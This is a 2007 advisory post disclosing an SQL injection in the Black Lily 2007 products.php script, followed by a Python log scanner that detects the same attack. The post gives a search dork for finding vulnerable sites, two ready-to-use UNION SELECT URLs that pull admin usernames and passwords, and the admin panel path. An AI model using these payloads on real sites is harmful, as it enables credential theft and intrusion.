From: verys-secret_(at)_hotmail.com <verys-secret_(at)_hotmail.com>
Date: 18.11.2007
Subject: Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability

#######################SnIper-sa.com################################
#                                                                  #
#  SSSSS      nnn        nn   ii  ppppppp  eeeeeeeee   rrrrr       #
# ss          nn nn      nn   ii  pp    p  ee          rr   rr     #
#s            nn  nn     nn   ii  pp    p  ee          rr     r    #
# ss          nn   nn    nn   ii  ppppppp  ee          rr   rr     #
#   sssss     nn    nn   nn   ii  pp       eeeeee      rrrr        #
#        ss   nn     nn  nn   ii  pp       ee          rrrr        #
#          s  nn      nn nn   ii  pp       ee          rr  rr      #
#        ss   nn        nnn   ii  pp       ee          rr   rr     #
#   sssss     nn        nnn   ii  pp       eeeeeeeeee  rr     rr   #
#                                                                  #
#####################VerY-SecReT####################################
####################################

found by :
              VerY SecReT
###########
HomePage : WwW.SnIpEr-Sa.Com
##################

Dork :  "Powered By The Black Lily 2007"
####################################

EXPLOIT:
 http://victim.com/ar/products.php?class=-1%20union%20select%201,2,
password,4,username%20from%20admin/*

or

http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,
password,username%20from%20admin/*

########################################

Admin Panel is in  http://victim.com/xx/admin/

#####################################

S.GreetZ: sniper-sa.com & sniper-sa & Rafoo
#############################
thanx :  shoot3r , Devil-X ,ReMOTeR , and all sniper members

##############

contact-mail : SecReT@SecuRitY.Com.Sa
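
A defender-side check for the request pattern in this advisory, as an added example that is not part of the original post: it scans web access logs for `products.php` requests whose `class` parameter is not a plain integer and flags UNION SELECT payloads. The log lines are constructed samples, and treating legitimate `class` values as non-negative integers is an assumption, not something the advisory states.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (client addresses are documentation ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [18/Nov/2007:10:01:02 +0000] "GET /en/products.php?class=3 HTTP/1.1" 200 5120
192.0.2.44 - - [18/Nov/2007:10:01:09 +0000] "GET /ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/* HTTP/1.1" 200 812
192.0.2.44 - - [18/Nov/2007:10:01:15 +0000] "GET /en/products.php?class=-1+UNION/**/SELECT+1,2,3,password,username+from+admin/* HTTP/1.1" 200 790
192.0.2.10 - - [18/Nov/2007:10:02:00 +0000] "GET /en/index.php?page=2 HTTP/1.1" 200 2048
192.0.2.77 - - [18/Nov/2007:10:03:30 +0000] "GET /en/products.php?class=7' HTTP/1.1" 500 310
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
COMMENT = re.compile(r'/\*.*?\*/', re.S)       # closed inline comment used to split keywords
OPEN_COMMENT = re.compile(r'/\*.*$', re.S)     # trailing unterminated comment
UNION = re.compile(r'\bunion\b(\s+all)?\s+select\b', re.I)

def classify(value):
    """Return None for a plain integer id (assumed legitimate), else a reason string."""
    if re.fullmatch(r'\d+', value):
        return None
    normalized = OPEN_COMMENT.sub(' ', COMMENT.sub(' ', value))
    if UNION.search(normalized):
        return 'union-select'
    return 'non-numeric'

def scan(log_text):
    """Return (client, status, reason, decoded value) for suspicious products.php hits."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        if not url.path.endswith('/products.php'):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get('class', []):
            reason = classify(value)
            if reason:
                findings.append((client, status, reason, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `union-select` hit answered with status 200 is the one to triage first, since the query ran without a server error.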
